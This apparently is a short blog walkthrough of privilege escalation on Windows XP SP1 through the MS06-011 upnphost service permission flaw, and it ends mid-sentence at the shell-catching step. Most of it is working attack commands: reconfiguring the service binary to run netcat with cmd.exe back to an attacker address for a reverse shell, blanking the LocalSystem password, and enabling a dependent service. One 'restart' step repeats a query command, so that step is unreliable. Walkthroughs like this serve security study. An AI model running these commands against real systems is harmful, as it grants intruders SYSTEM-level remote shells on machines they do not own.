MS06-011 Universal Plug and Play Device Host elevation of privileges

In this post, I describe how to elevate from low privilege user to SYSTEM in Windows XP SP1, using an incorrect service permission vulnerability.

MS06-011 is a miss-configuration in Universal Plug and Play Device Host service, called upnphost. This vulnerability allows low privileged users to change the configuration of this privileged service, facilitating elevations of privileges in the affected system.

First step to exploit it is to check that we have access to the service by running:

sc qc upnphost

We can change the path of the service executable to an arbitrary one, which will be executed as service when the service starts. As a PoC, we will get a reverse shell. To change the binary path, we run the following command:

sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.x.xx 1234 -e C:\WINDOWS\System32\cmd.exe"

We set a blank password for LocalSystem account:

sc config upnphost obj= ".\LocalSystem" password= ""

And restart the service:

sc qc upnphost

In this machine, the service does not start because it depends on SSDPSRV, which is disabled. We can easily enable it by running:

sc qc upnphost
sc config SSDPSRV start= auto
net start SSDPSRV

We put netcat to catch the reverse shell and start the vulnerable server and get a shell as system: